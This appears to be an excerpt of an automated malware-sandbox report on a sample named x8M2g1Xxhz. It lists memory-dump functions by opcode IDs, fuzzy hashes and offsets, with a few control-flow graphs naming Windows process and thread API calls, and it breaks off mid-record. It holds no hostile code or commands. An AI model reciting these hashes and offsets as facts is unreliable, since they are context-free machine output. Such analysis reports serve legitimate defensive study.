                                                                                                                      • Snapshot File: hcaresult_0_2_8510000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fef445b8b1cea72a49d5fc672ac4b47115f90a596e42154c7d40c1f6330fc370
                                                                                                                      • Instruction ID: 11b3576e175753380cc622463ba74ee09ff59734aa2f58e3575ad4ef1f58cc54
                                                                                                                      • Opcode Fuzzy Hash: fef445b8b1cea72a49d5fc672ac4b47115f90a596e42154c7d40c1f6330fc370
                                                                                                                      • Instruction Fuzzy Hash: C181CF74E00218CFEB68DFAAD984B9DBBF2BF89301F20846AD409AB354DB345945CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 42a57038dde22f3a515660954e2ce35ebed58a138306a63e5c82ae2e88104621
                                                                                                                      • Instruction ID: 5e5ec437fd54d4c12c6fa98530b10b3606b45db0ad67b00adcf15424d86845da
                                                                                                                      • Opcode Fuzzy Hash: 42a57038dde22f3a515660954e2ce35ebed58a138306a63e5c82ae2e88104621
                                                                                                                      • Instruction Fuzzy Hash: 5871A275D01628CFDB68DF6AC9947DDFBB2BB89301F1490AAD409A7250DB34AA81CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4280f30338514c2aeba3a5ec66f4cb53442589301896934f0a884dc7cca3bca9
                                                                                                                      • Instruction ID: e0810047e54916bf3049188e4bdb7af296adad7712fb3a8ab0551e3d105582d2
                                                                                                                      • Opcode Fuzzy Hash: 4280f30338514c2aeba3a5ec66f4cb53442589301896934f0a884dc7cca3bca9
                                                                                                                      • Instruction Fuzzy Hash: 81819470E016288FEB68CF6AD944B9ABBF2BF89300F14C1E9D508A7254DB744A85CF55
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9cc2990ee1240f4a149b53510b079e791d5a8bb9f848911dd385038860e36778
                                                                                                                      • Instruction ID: 9e2caf8c5d68d9c4750c527335d6fd5801132f19f7c07a8380a3026ed270f2e8
                                                                                                                      • Opcode Fuzzy Hash: 9cc2990ee1240f4a149b53510b079e791d5a8bb9f848911dd385038860e36778
                                                                                                                      • Instruction Fuzzy Hash: 6181A6B1E012198FEB28CF6AC944B9AFAF2BF88300F14C1E9D508A7254DB745A85CF51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 289e4269f342bf40414c5e727a6e88c09de9bad0ed55a1516c0624cf3c3f77c2
                                                                                                                      • Instruction ID: fd84040a70e94699763b007b63f04a97890f592d5adae88d126642ea44617007
                                                                                                                      • Opcode Fuzzy Hash: 289e4269f342bf40414c5e727a6e88c09de9bad0ed55a1516c0624cf3c3f77c2
                                                                                                                      • Instruction Fuzzy Hash: FF818571E016288FEB68CF6AC954B9DFAF2BF89300F14C1EAD408A7254DB745A85CF51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 54f6d376dde3b2e9e871cab3762e189ad0ad28dd6702f86a471a4e9116b9e9fb
                                                                                                                      • Instruction ID: 1660d61797040c69496f0c68fdd3eb8641b596d97103216d801572197a559589
                                                                                                                      • Opcode Fuzzy Hash: 54f6d376dde3b2e9e871cab3762e189ad0ad28dd6702f86a471a4e9116b9e9fb
                                                                                                                      • Instruction Fuzzy Hash: 4761C574E00208DFEB18DFEAD984A9DBBF2BF89310F149069D418AB365EB746941CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d06a53479bda98fa6cf91d369229f64c5f63a8a22353af013e39e6c48f6584b7
                                                                                                                      • Instruction ID: c66101d9807f8dd46135e56eb8c945c60a497a2b0f16cd48b05262276bc23bbb
                                                                                                                      • Opcode Fuzzy Hash: d06a53479bda98fa6cf91d369229f64c5f63a8a22353af013e39e6c48f6584b7
                                                                                                                      • Instruction Fuzzy Hash: 5951C674E01208DFEB18DFAAD584A9DBBB2FF89310F10C029E815AB364DB309941DF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3797118005.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4710000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8a8abf8da0172939bd81d7ebeaec9c5391148c2bad0f971102aeb8070e5d73b3
                                                                                                                      • Instruction ID: 450aceb7c931e57be8e4961d959bb491560a679efa4ec26ba88808ba3bdf10dd
                                                                                                                      • Opcode Fuzzy Hash: 8a8abf8da0172939bd81d7ebeaec9c5391148c2bad0f971102aeb8070e5d73b3
                                                                                                                      • Instruction Fuzzy Hash: 52519674E01208DFEB18DFAAD594A9DBBF2BF89310F20D029E815AB364DB319941DF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801879706.0000000008580000.00000040.00000800.00020000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8580000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7a79fc6a1fd6d223beeabeb068f26ce12a8b7db15543a3b32766b4e261e208ee
                                                                                                                      • Instruction ID: 444f319b8de027c0508af50debb6a46687c3241d70f0ddc9684022146479b579
                                                                                                                      • Opcode Fuzzy Hash: 7a79fc6a1fd6d223beeabeb068f26ce12a8b7db15543a3b32766b4e261e208ee
                                                                                                                      • Instruction Fuzzy Hash: E751CFB0D00208CBEB18DFAAD9547DEBBF6BB89305F14C06AC418BB295DB355946CF24
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801830365.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8510000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: edaaca210c2c8748d95acb61d19acb89563dd1aeafbed1f67cf7faa9418c3e3b
                                                                                                                      • Instruction ID: bbcddae6fd25a5ef22484d547031174ef38473092f75bb46ecc888152c243695
                                                                                                                      • Opcode Fuzzy Hash: edaaca210c2c8748d95acb61d19acb89563dd1aeafbed1f67cf7faa9418c3e3b
                                                                                                                      • Instruction Fuzzy Hash: 6F41C1B4D002088BEB28DFAAC85479DBBB2BF89305F14C16AC418AB294DB755946CF64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801854824.0000000008570000.00000040.00000800.00020000.00000000.sdmp, Offset: 08570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8570000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d912f802c3ddfdcf6a6297737e3e98d5f7054b8979b24e5fc17d47d363c85e35
                                                                                                                      • Instruction ID: b6bdfa7fabb405cbe197036db1738acf001a9684078fa310587dffa38e04ec97
                                                                                                                      • Opcode Fuzzy Hash: d912f802c3ddfdcf6a6297737e3e98d5f7054b8979b24e5fc17d47d363c85e35
                                                                                                                      • Instruction Fuzzy Hash: 4F41F874D09688CFDB05DFAAD85469DBFF2BF8A301F14C0AAC444AB2A6DB345906CF51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801879706.0000000008580000.00000040.00000800.00020000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8580000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c9ec0c23a87a4c0cfc940241591f9559bf42445e6d955ec7f6e63278b6421431
                                                                                                                      • Instruction ID: f2e383ff5ea29295c0ed3b5b54bfbc00dd64566f2decb06d4a2f3bf75362296a
                                                                                                                      • Opcode Fuzzy Hash: c9ec0c23a87a4c0cfc940241591f9559bf42445e6d955ec7f6e63278b6421431
                                                                                                                      • Instruction Fuzzy Hash: 4C4126B0D04248CBDB09EFBAD8546DEBBF2BF89301F14846AC458BB295DB345946CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cbfa2974f912de416e9bcbff86b195419641c7709054455e05dbdad53311c023
                                                                                                                      • Instruction ID: 7d9ab7f80bacc6289cf3c4dbc24116f24629d043205d3535c527a73fe6b24089
                                                                                                                      • Opcode Fuzzy Hash: cbfa2974f912de416e9bcbff86b195419641c7709054455e05dbdad53311c023
                                                                                                                      • Instruction Fuzzy Hash: 994147B1E016588BEB58CF5BD9447DAFAF3AFC9300F14C1BAC50CA6264DB7409868F55
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e6ffbd167859a9b65efb6dd091c1fca663940421e736a35b3f35e8e5092e0017
                                                                                                                      • Instruction ID: c0a1a40ced489f7b5753a0034522c6891a3c74195d96bad03ba04166c2394c93
                                                                                                                      • Opcode Fuzzy Hash: e6ffbd167859a9b65efb6dd091c1fca663940421e736a35b3f35e8e5092e0017
                                                                                                                      • Instruction Fuzzy Hash: 104167B1E016188BEB58CF6BD9447DAFAF3AFC9300F14C1BAD50CAA254DB740A858F51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3cfc876926c1b9511461e27e189dd57fdaee46aa022b922d72b39b9636aa821f
                                                                                                                      • Instruction ID: b226caf91c905a160258b8ce44942f16adb9e093d57b0b593ac17781362f60d9
                                                                                                                      • Opcode Fuzzy Hash: 3cfc876926c1b9511461e27e189dd57fdaee46aa022b922d72b39b9636aa821f
                                                                                                                      • Instruction Fuzzy Hash: D8417A71D056188BEB68CF5BCD5479EFAF3AFC9300F14C1AAC50CA6264DB7409858F51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cc9a1b1e388b1d6a27217e6bf4a7293b6dd8ee3dbdf899b998554c09fb823679
                                                                                                                      • Instruction ID: 2d1c64d3396d056439eb0fb5e3c31b848ba760fce3e047b507d55f61a78a58da
                                                                                                                      • Opcode Fuzzy Hash: cc9a1b1e388b1d6a27217e6bf4a7293b6dd8ee3dbdf899b998554c09fb823679
                                                                                                                      • Instruction Fuzzy Hash: DF4168B5E016188BEB58CF5BD9447DAFAF3BFC9300F14C0AAC50CAA264DB7409858F51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1dba3f62c8d2e51c86aa1e45f347549fa873373f0b31c69cc0a0640c63ed2a1c
                                                                                                                      • Instruction ID: db20e2388123744417d5045a2ac06a130ccebc4aed8c6e7077dd7fce095459d3
                                                                                                                      • Opcode Fuzzy Hash: 1dba3f62c8d2e51c86aa1e45f347549fa873373f0b31c69cc0a0640c63ed2a1c
                                                                                                                      • Instruction Fuzzy Hash: 5D4168B1E016188BEB58CF5BD9447DAFAF3BFC9300F14C5AAC50CA6254EB3409858F51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801949745.00000000085B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085B0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85b0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 66bdacb057ff2e14613c8bf383b3935de91555d64677916cc3c47b1f57a457e4
                                                                                                                      • Instruction ID: 2dc3f0211cd6e86b8028f3df0056b3dd3ed544a2068788d1f9f25d694dac0794
                                                                                                                      • Opcode Fuzzy Hash: 66bdacb057ff2e14613c8bf383b3935de91555d64677916cc3c47b1f57a457e4
                                                                                                                      • Instruction Fuzzy Hash: 2841F470E002188BEB18DFAAD8547EDFBF2BF99301F14D02AD418AB254DB345946CF64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e4b49cb7231b3e3ff03ca61d98ec24c5edd21e13d51a361508231e49eb762684
                                                                                                                      • Instruction ID: 5bd4714c4f3b7d1199ff5176e9cdf3927ea9cc9f3fa592668e60bffc54bcd18a
                                                                                                                      • Opcode Fuzzy Hash: e4b49cb7231b3e3ff03ca61d98ec24c5edd21e13d51a361508231e49eb762684
                                                                                                                      • Instruction Fuzzy Hash: EE4156B1E016188BEB68CF5BD94479AFAF3AFC9300F14C1BAD50CA6254EB740A858F51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 22ed645ac282a80dc5874cb83a033d2889459ac8757158f0d1c781a9f703f633
                                                                                                                      • Instruction ID: 51f906ad60a703680a9acc8d6cb67bb994a221c572f2982d4db62d4df16932c9
                                                                                                                      • Opcode Fuzzy Hash: 22ed645ac282a80dc5874cb83a033d2889459ac8757158f0d1c781a9f703f633
                                                                                                                      • Instruction Fuzzy Hash: D141E274D04248CBEB18DFEAD8547AEFBF2ABC9304F24C16AC414AB295DB345945CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801830365.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8510000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ccc5c534a58d07666ffaf6e92bf4c63adbd4b39252dabefbc05cf66fca64f8bd
                                                                                                                      • Instruction ID: b9c4dda4c42bf9e4a53b34c42afffe7cf64791a67913214d9cc4d9c1ab3c1f5c
                                                                                                                      • Opcode Fuzzy Hash: ccc5c534a58d07666ffaf6e92bf4c63adbd4b39252dabefbc05cf66fca64f8bd
                                                                                                                      • Instruction Fuzzy Hash: FA41C174D04248CBEF08DFAAD854A9EBBB2BF89301F14C02AC418AB255EB345946CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801879706.0000000008580000.00000040.00000800.00020000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8580000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 031c334329a2ca22a6307594f044f2585c14f317dfb36540b2fa720fa6e5080b
                                                                                                                      • Instruction ID: caea8321af09f9e29c0bae6198db16442eccc64c69726047f0bc9218ef333425
                                                                                                                      • Opcode Fuzzy Hash: 031c334329a2ca22a6307594f044f2585c14f317dfb36540b2fa720fa6e5080b
                                                                                                                      • Instruction Fuzzy Hash: B641D274E01208CBDB18EFAAD8547ADBBF2BF89300F14D06AC419BB295EB345946CF50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801680368.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8300000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 09e8d8edb11e9ba4ab25b62ec546a2b77d2edeccaf7a1985fbc0a0ae94712644
                                                                                                                      • Instruction ID: 7f24b669e54412d88e91f15a0a7b6094899c95d69f4dbfcbec62e193d6055226
                                                                                                                      • Opcode Fuzzy Hash: 09e8d8edb11e9ba4ab25b62ec546a2b77d2edeccaf7a1985fbc0a0ae94712644
                                                                                                                      • Instruction Fuzzy Hash: E1410374D05248CBDB18CFAAD9596EEFBF2AFC9301F20C02AD418AB299DB344945CF54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3801879706.0000000008580000.00000040.00000800.00020000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8580000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1059c4345e6f41025cc01999c3660852c78d2edc5dd8fb9c0e9d7b11dddb1f88
                                                                                                                      • Instruction ID: 2609a7e04f6095bcabbdb8eb662ba77f5ef0825986b2dd190ffddaf2129e22f7
                                                                                                                      • Opcode Fuzzy Hash: 1059c4345e6f41025cc01999c3660852c78d2edc5dd8fb9c0e9d7b11dddb1f88
                                                                                                                      • Instruction Fuzzy Hash: 5C41D374D00608CBEB18DFAAD5546AEBBF2BF89301F20D12AC415BB2A5DB345946CF54

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 179 85fc730-85fc732 180 85fc73c-85fc743 179->180 181 85fc733-85fc738 179->181 184 85fc744-85fc7cf GetCurrentProcess 180->184 182 85fc739-85fc73a 181->182 183 85fc708-85fc72a 181->183 182->180 182->184 183->179 188 85fc7d8-85fc80c GetCurrentThread 184->188 189 85fc7d1-85fc7d7 184->189 190 85fc80e-85fc814 188->190 191 85fc815-85fc849 GetCurrentProcess 188->191 189->188 190->191 193 85fc84b-85fc851 191->193 194 85fc852-85fc86d call 85fc910 191->194 193->194 197 85fc873-85fc8a2 GetCurrentThreadId 194->197 198 85fc8ab-85fc90d 197->198 199 85fc8a4-85fc8aa 197->199 199->198
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 085FC7BE
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 085FC7FB
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 085FC838
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 085FC891
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2063062207-0
                                                                                                                      • Opcode ID: 37a14bd5e4636d0eeea04f78ac314460879f0811f5b35c46a390aa6e019fef5d
                                                                                                                      • Instruction ID: 036b1239fac91b3d19889ec68b24637484fa4e90f61f210be7b2aa781b77db7c
                                                                                                                      • Opcode Fuzzy Hash: 37a14bd5e4636d0eeea04f78ac314460879f0811f5b35c46a390aa6e019fef5d
                                                                                                                      • Instruction Fuzzy Hash: C76199709013488FDB14CFAAD5487AEBBF0BF88314F2484ADE519A73A2C7755948CB65

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 206 85fc740-85fc7cf GetCurrentProcess 211 85fc7d8-85fc80c GetCurrentThread 206->211 212 85fc7d1-85fc7d7 206->212 213 85fc80e-85fc814 211->213 214 85fc815-85fc849 GetCurrentProcess 211->214 212->211 213->214 216 85fc84b-85fc851 214->216 217 85fc852-85fc86d call 85fc910 214->217 216->217 220 85fc873-85fc8a2 GetCurrentThreadId 217->220 221 85fc8ab-85fc90d 220->221 222 85fc8a4-85fc8aa 220->222 222->221
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 085FC7BE
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 085FC7FB
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 085FC838
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 085FC891
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3802046786.00000000085F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085F0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_85f0000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2063062207-0
                                                                                                                      • Opcode ID: e0df99336a1a266bb0f1d821bdb92291036b5a43727a2c4c3b7b6d657c640c95
                                                                                                                      • Instruction ID: 27223b118763192d0e611c20c9f6a9f3a938b2b5330727674972c2e9a3e867c2
                                                                                                                      • Opcode Fuzzy Hash: e0df99336a1a266bb0f1d821bdb92291036b5a43727a2c4c3b7b6d657c640c95
                                                                                                                      • Instruction Fuzzy Hash: DC5134B09003098FDB64CFAAD548BEEBBF1FB88318F208469E509A7351D7746944CB65

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 229 4660062-4660069 230 4660070-466007d 229->230 231 466006b-466006f 229->231 233 4660017-466005d 230->233 234 466007f-4660083 230->234 232 4660086-466046e call 46601ae call 4660305 231->232 282 4660481-4660499 Module32FirstW 232->282 233->231 234->232 283 46604a3-46604c4 call 46604cb 282->283 287 46604f6-4660865 call 4660546 call 46606be call 466076b call 466085a call 4660877 283->287 288 46604c6-46604f5 283->288 338 466086a 287->338 288->287 338->338
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 6501b786834597930c9f86f77ba7dfb569582ff06332f10eacef274f24e47073
                                                                                                                      • Instruction ID: eddf1884e16f8b7379af91aa73655b3ebb3c9a34e2d1fdce4b0925ed5c1b8e1b
                                                                                                                      • Opcode Fuzzy Hash: 6501b786834597930c9f86f77ba7dfb569582ff06332f10eacef274f24e47073
                                                                                                                      • Instruction Fuzzy Hash: 8DC1CFFB34C222BDB152D4452F64AFB6B6EE6D6730730843AF807D6542F2892E4B6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: c3fde723ce25a8057ee7f0c5729368667e17276d8a57fe0e24ae2d56242b5e10
                                                                                                                      • Instruction ID: b623d38e0e3058f83fd3cd4a24942ead520b9adf41cbddb5c192b05f581c4346
                                                                                                                      • Opcode Fuzzy Hash: c3fde723ce25a8057ee7f0c5729368667e17276d8a57fe0e24ae2d56242b5e10
                                                                                                                      • Instruction Fuzzy Hash: D7C1AEFB34D221BD7152D4462B64AFB576EE6D6730730843AF807D6942F2942E4F6071

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.3796950780.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4660000_x8M2g1Xxhz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-3752478910
                                                                                                                      • Opcode ID: 7c4ce845f1c141696058c1568b411aa5c8ef49edbc65b96d2c234b647d9dbd01
                                                                                                                      • Instruction ID: 485af8f804ed635fe7aa7ba3a9f569100669b4cdc179753b9ccc1380213be77e
                                                                                                                      • Opcode Fuzzy Hash: 7c4ce845f1c141696058c1568b411aa5c8ef49edbc65b96d2c234b647d9dbd01
